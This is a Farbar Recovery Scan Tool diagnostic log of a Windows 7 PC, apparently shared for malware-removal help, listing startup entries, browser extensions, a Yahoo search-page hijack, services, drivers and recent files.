HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [Amazon Music] => C:\Users\hilton\AppData\Local\Amazon Music\Amazon Music Helper.exe [3694056 2017-01-31] (Amazon Services LLC)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [Fences] => C:\Program Files\Stardock\Fences\Fences.exe [3934168 2016-09-16] (Stardock Corporation)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [eM Client] => C:\Program Files\eM Client\MailClient.exe [24742760 2016-10-21] (eM Client s.r.o.)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [DellSystemDetect] => C:\Users\hilton\AppData\Local\Apps\2.0\3VGPG9W0.MP E\2E0VXQW4.WA5\dell..tion_6d0a76327dca4869_0007.00 0b_df227eeaae3cac0d\DellSystemDetect.exe [310728 2017-02-07] (Dell)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Run: [RoboForm] => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [110376 2017-04-12] (Siber Systems)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
ShellIconOverlayIdentifiers: [00asw] → {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2017-04-12] (AVAST Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2017-02-27]
ShortcutTarget: Bluetooth.lnk → C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip..\Interfaces{7F3D0977-3F81-48D1-8A0D-5B6CF1496778}: [NameServer] 77.234.40.79
Tcpip..\Interfaces{B78AF187-32FB-4F20-86D2-C40DA41B6832}: [DhcpNameServer] 209.18.47.61 209.18.47.62
[HEADING=1]Internet Explorer:[/HEADING]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_mdaffmarmarie_16_28_rps11 5078_rps&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus% 26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtC0EyE0F0F tC0BtC0FyEyEyEtCtBtN0D0Tzu0StCyCyDyBtN1L2XzutAtFtB tBtFtAtFtCtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByCzy yEtCyEtAtAtGyCtA0EtDtG0Dzz0C0CtGyEyB0FtAtGzy0AyDyD tD0AtD0Azy0D0BtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0Bzy0C 0FtC0CzytG0D0EtB0AtGyE0EyE0BtGzzyCtBzytG0F0D0CyDyE zyzy0EtCyEtAyE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtBtCtD %26cr%3D861529325%26a%3Dwbf_mdaffmarmarie_16_28%26 os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional
SearchScopes: HKLM → DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_mdaffmarmarie_16_28_rps11 5078_rps&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus% 26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtC0EyE0F0F tC0BtC0FyEyEyEtCtBtN0D0Tzu0StCyCyDyBtN1L2XzutAtFtB tBtFtAtFtCtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByCzy yEtCyEtAtAtGyCtA0EtDtG0Dzz0C0CtGyEyB0FtAtGzy0AyDyD tD0AtD0Azy0D0BtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0Bzy0C 0FtC0CzytG0D0EtB0AtGyE0EyE0BtGzzyCtBzytG0F0D0CyDyE zyzy0EtCyEtAyE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtBtCtD %26cr%3D861529325%26a%3Dwbf_mdaffmarmarie_16_28%26 os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={ searchTerms}
SearchScopes: HKLM → {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_mdaffmarmarie_16_28_rps11 5078_rps&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus% 26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzutDtDtC0EyE0F0F tC0BtC0FyEyEyEtCtBtN0D0Tzu0StCyCyDyBtN1L2XzutAtFtB tBtFtAtFtCtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StByCzy yEtCyEtAtAtGyCtA0EtDtG0Dzz0C0CtGyEyB0FtAtGzy0AyDyD tD0AtD0Azy0D0BtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StB0Bzy0C 0FtC0CzytG0D0EtB0AtGyE0EyE0BtGzzyCtBzytG0F0D0CyDyE zyzy0EtCyEtAyE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtBtCtD %26cr%3D861529325%26a%3Dwbf_mdaffmarmarie_16_28%26 os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={ searchTerms}
BHO: RoboForm Toolbar Helper → {724d43a9-0d85-11d4-9908-00400523e39a} → C:\Program Files\Siber Systems\AI RoboForm\roboform.dll [2017-04-12] (Siber Systems Inc.)
BHO: avast! Online Security → {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} → C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-12] (AVAST Software)
Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll [2017-04-12] (Siber Systems Inc.)
Toolbar: HKU\S-1-5-21-3292114827-816517840-1514174382-1000 → &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files\Siber Systems\AI RoboForm\roboform.dll [2017-04-12] (Siber Systems Inc.)
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} hxxps://files.pcpitstop.com/cab/pcmatic.cab
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
[HEADING=1]FireFox:[/HEADING]
FF DefaultProfile: hiltonheflin@yahoo.com
FF ProfilePath: C:\Users\hilton\AppData\Roaming\Mozilla\Firefox\Pr ofiles\pc153f57.default-1485114558992 [2017-04-13]
FF Extension: (Adblock Plus) - C:\Users\hilton\AppData\Roaming\Mozilla\Firefox\Pr ofiles\pc153f57.default-1485114558992\Extensions{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-03]
FF Extension: (Disable Prefetch) - C:\Users\hilton\AppData\Roaming\Mozilla\Firefox\Pr ofiles\pc153f57.default-1485114558992\features{24ba2855-20b3-4585-bcde-f033a53eda89}\disable-prefetch@mozilla.org.xpi [2017-04-06]
FF HKLM...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF48
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF48 [2017-04-12]
FF HKLM...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF48
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF48 [2017-04-12]
FF HKLM...\Firefox\Extensions: [{22119944-ED35-4ab1-910B-E619EA06A115}] - C:\Program Files\Siber Systems\AI RoboForm\Firefox\roboform.xpi
FF Extension: (RoboForm Toolbar) - C:\Program Files\Siber Systems\AI RoboForm\Firefox\roboform.xpi [2017-04-12]
FF HKU\S-1-5-21-3292114827-816517840-1514174382-1000...\Firefox\Extensions: [{22119944-ED35-4ab1-910B-E619EA06A115}] - C:\Program Files\Siber Systems\AI RoboForm\Firefox\roboform.xpi
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 → c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 → C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 → C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
FF Plugin: Adobe Reader → C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
[HEADING=1]Chrome:[/HEADING]
CHR Profile: C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhon fmgoek [2017-04-12]
CHR Extension: (Docs) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfi lokake [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigk jlhalf [2016-12-25]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldk acnbeo [2016-12-25]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmnlcjabgnpnenekpadlanbbko oimhnj [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefi ndmkaj [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihc jkigck [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpeb giejap [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdl olhkhi [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegiea cbdmki [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegep lioahd [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccm gmieda [2017-04-12]
CHR Extension: (Gmail) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoe jaedia [2017-04-03]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcj beemfm [2017-04-12]
CHR Extension: (No Name) - C:\Users\hilton\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnlccmojcmeohlpggmfnbbiapk mbliob [2017-04-12]
CHR HKLM...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM...\Chrome\Extension: [okmhneofinpilciglijihehjpaegledb] - <no Path/update_url>
CHR HKLM...\Chrome\Extension: [pnlccmojcmeohlpggmfnbbiapkmbliob] - C:\Program Files\Siber Systems\AI RoboForm\Chrome\rf-chrome.crx [2016-08-12]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [5758120 2017-04-12] (AVAST Software s.r.o.)
R2 atchksrv; C:\Program Files\Intel\AMT\atchksrv.exe [176128 2009-12-01] (Intel Corporation) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-12] (AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [310496 2017-04-12] (AVAST Software)
R2 Bluetooth Device Monitor; C:\Program Files\Intel\Bluetooth\devmonsrv.exe [1202216 2016-07-18] (Motorola Solutions, Inc.)
R2 Bluetooth Media Service; C:\Program Files\Intel\Bluetooth\mediasrv.exe [1722408 2016-07-18] (Motorola Solutions, Inc.)
R2 Bluetooth OBEX Service; C:\Program Files\Intel\Bluetooth\obexsrv.exe [1161256 2016-07-18] (Motorola Solutions, Inc.)
R2 iBtSiva; C:\Program Files\Intel\Bluetooth\ibtsiva.exe [151280 2016-07-23] (Intel Corporation)
R2 Intel(R) PROSet Monitoring Service; C:\Windows\system32\IProsetMonitor.exe [180992 2014-10-16] (Intel Corporation)
R2 LMS; C:\Program Files\Intel\AMT\LMS.exe [102400 2009-12-01] (Intel) [File not signed]
R3 SlimWareServices; C:\Program Files\SlimWare Utilities\Services\SlimWare.Services.exe [68952 2016-08-01] (SlimWare Utilities Holdings, Inc.)
S3 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UNS; C:\Program Files\Intel\AMT\UNS.exe [2519040 2009-12-01] (Intel) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdriverx.sys [255184 2017-04-12] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidshx.sys [148208 2017-04-12] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswblogx.sys [267528 2017-04-12] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbunivx.sys [41176 2017-04-12] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [34136 2017-04-12] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [31064 2017-04-12] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [106904 2017-04-12] (AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [27896 2017-03-12] (AVAST Software)
R1 aswNetSec; C:\Windows\system32\drivers\aswNetSec.sys [388488 2017-04-12] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [90336 2017-04-12] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [62152 2017-04-12] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [764064 2017-04-12] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [472760 2017-04-12] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [118800 2017-04-12] (AVAST Software)
S3 aswTap; C:\Windows\System32\DRIVERS\aswTap.sys [38984 2016-12-18] (The OpenVPN Project)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [279800 2017-04-12] (AVAST Software)
S3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [168232 2012-03-31] (Broadcom Corporation.)
S3 btmaudio; C:\Windows\System32\drivers\btmaud.sys [72168 2015-10-13] (Motorola Solutions, Inc.)
S3 btmaux; C:\Windows\System32\DRIVERS\btmaux.sys [116200 2015-10-13] (Motorola Solutions, Inc.)
S3 btwampfl; C:\Windows\System32\DRIVERS\btwampfl.sys [504360 2012-03-31] (Broadcom Corporation.)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [107648 2016-07-22] (Samsung Electronics Co., Ltd.)
R3 e1express; C:\Windows\System32\DRIVERS\e1e6232.sys [232312 2012-10-30] (Intel Corporation)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [26792 2015-05-29] (Synaptics Incorporated)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [146048 2016-07-22] (Samsung Electronics Co., Ltd.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [11232 2016-09-21] ()
S3 mfeplk; system32\drivers\mfeplk.sys

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-13 12:33 - 2017-04-13 12:33 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (4).exe
2017-04-13 12:15 - 2017-04-13 12:15 - 00001146 _____ C:\Users\hilton\Desktop\Addition - Shortcut.lnk
2017-04-13 12:15 - 2017-04-13 12:15 - 00001106 _____ C:\Users\hilton\Desktop\FRST - Shortcut.lnk
2017-04-13 12:07 - 2017-04-13 12:07 - 00001124 _____ C:\Users\hilton\Desktop\FRST (3) - Shortcut.lnk
2017-04-13 12:06 - 2017-04-13 12:06 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (3).exe
2017-04-13 12:00 - 2017-04-13 12:00 - 00001124 _____ C:\Users\hilton\Downloads\FRST (2) - Shortcut.lnk
2017-04-13 11:59 - 2017-04-13 11:59 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (2).exe
2017-04-13 11:45 - 2017-04-13 11:45 - 00001124 _____ C:\Users\hilton\Downloads\FRST (1) - Shortcut.lnk
2017-04-13 11:44 - 2017-04-13 11:44 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST (1).exe
2017-04-13 11:42 - 2017-04-13 12:09 - 00063931 _____ C:\Users\hilton\Downloads\Shortcut.txt
2017-04-13 11:41 - 2017-04-13 12:09 - 00023142 _____ C:\Users\hilton\Downloads\Addition.txt
2017-04-13 11:40 - 2017-04-13 12:34 - 00018726 _____ C:\Users\hilton\Downloads\FRST.txt
2017-04-13 11:38 - 2017-04-13 11:38 - 01766912 _____ (Farbar) C:\Users\hilton\Downloads\FRST.exe
2017-04-12 16:04 - 2017-04-12 16:04 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-04-12 15:18 - 2017-04-12 15:18 - 00000000 ____D C:\Users\TEMP\AppData\Roaming\AVAST Software
2017-04-12 15:18 - 2017-04-12 15:18 - 00000000 ____D C:\ProgramData\PC Drivers HeadQuarters
2017-04-12 15:17 - 2017-04-12 15:19 - 00000000 ____D C:\Users\TEMP
2017-04-12 14:42 - 2017-03-27 13:28 - 00346320 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-04-12 14:42 - 2017-03-25 15:39 - 20284416 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-04-12 14:42 - 2017-03-25 15:07 - 04604416 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-04-12 14:42 - 2017-03-25 15:06 - 13654016 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-04-12 14:42 - 2017-03-25 14:55 - 02767360 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-04-12 14:42 - 2017-03-25 14:52 - 02289152 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-04-12 14:42 - 2017-03-25 14:51 - 01313280 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-04-12 14:42 - 2017-03-25 14:48 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-04-12 14:42 - 2017-03-25 14:47 - 02055680 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-04-12 14:42 - 2017-03-25 14:47 - 00710144 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-04-12 14:42 - 2017-03-25 14:47 - 00103936 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-04-12 14:42 - 2017-03-25 14:47 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2017-04-12 14:42 - 2017-03-25 14:47 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00693248 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2017-04-12 14:42 - 2017-03-25 14:46 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2017-04-12 14:42 - 2017-03-25 14:45 - 00689664 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-04-12 14:42 - 2017-03-25 14:45 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2017-04-12 14:42 - 2017-03-25 14:45 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-04-12 14:42 - 2017-03-25 14:45 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2017-04-12 14:42 - 2017-03-25 14:45 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2017-04-12 14:42 - 2017-03-25 14:45 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-04-12 14:42 - 2017-03-25 14:45 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2017-04-12 14:42 - 2017-03-25 14:45 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2017-04-12 14:42 - 2017-03-25 14:44 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2017-04-12 14:42 - 2017-03-25 14:44 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-04-12 14:42 - 2017-03-25 13:19 - 00341504 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2017-04-12 14:42 - 2017-03-25 13:06 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2017-04-12 14:42 - 2017-03-25 12:57 - 00667648 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2017-04-12 14:42 - 2017-03-25 12:27 - 01155072 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2017-04-12 14:42 - 2017-03-24 18:41 - 00306688 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-04-12 14:42 - 2017-03-22 11:24 - 02953216 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2017-04-12 14:42 - 2017-03-22 11:24 - 00174080 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2017-04-12 14:42 - 2017-03-22 11:20 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2017-04-12 14:42 - 2017-03-22 11:06 - 02091520 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2017-04-12 14:42 - 2017-03-22 11:05 - 00573440 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2017-04-12 14:42 - 2017-03-22 11:05 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2017-04-12 14:42 - 2017-03-22 11:05 - 00093696 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2017-04-12 14:42 - 2017-03-22 11:05 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2017-04-12 14:42 - 2017-03-22 11:05 - 00035328 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2017-04-12 14:42 - 2017-03-22 11:05 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2017-04-12 14:42 - 2017-03-22 11:05 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2017-04-12 14:42 - 2017-03-14 11:23 - 00730344 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-04-12 14:42 - 2017-03-14 11:23 - 00218856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-04-12 14:42 - 2017-03-14 11:17 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2017-04-12 14:42 - 2017-03-10 12:27 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2017-04-12 14:42 - 2017-03-10 12:19 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2017-04-12 14:42 - 2017-03-10 12:19 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2017-04-12 14:42 - 2017-03-10 12:19 - 00010240 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2017-04-12 14:42 - 2017-03-10 11:54 - 02400256 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-04-12 14:42 - 2017-03-10 11:53 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2017-04-12 14:42 - 2017-03-08 16:10 - 00805376 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2017-04-12 14:42 - 2017-03-08 00:26 - 04000488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2017-04-12 14:42 - 2017-03-08 00:26 - 03945192 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-04-12 14:42 - 2017-03-08 00:26 - 00137960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-04-12 14:42 - 2017-03-08 00:26 - 00067304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-04-12 14:42 - 2017-03-08 00:24 - 01310528 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 01416192 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 01062912 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00872448 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00655360 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00553472 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00400896 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00294400 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00261120 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00172032 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00171008 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00038912 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-04-12 14:42 - 2017-03-08 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-04-12 14:42 - 2017-03-08 00:21 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
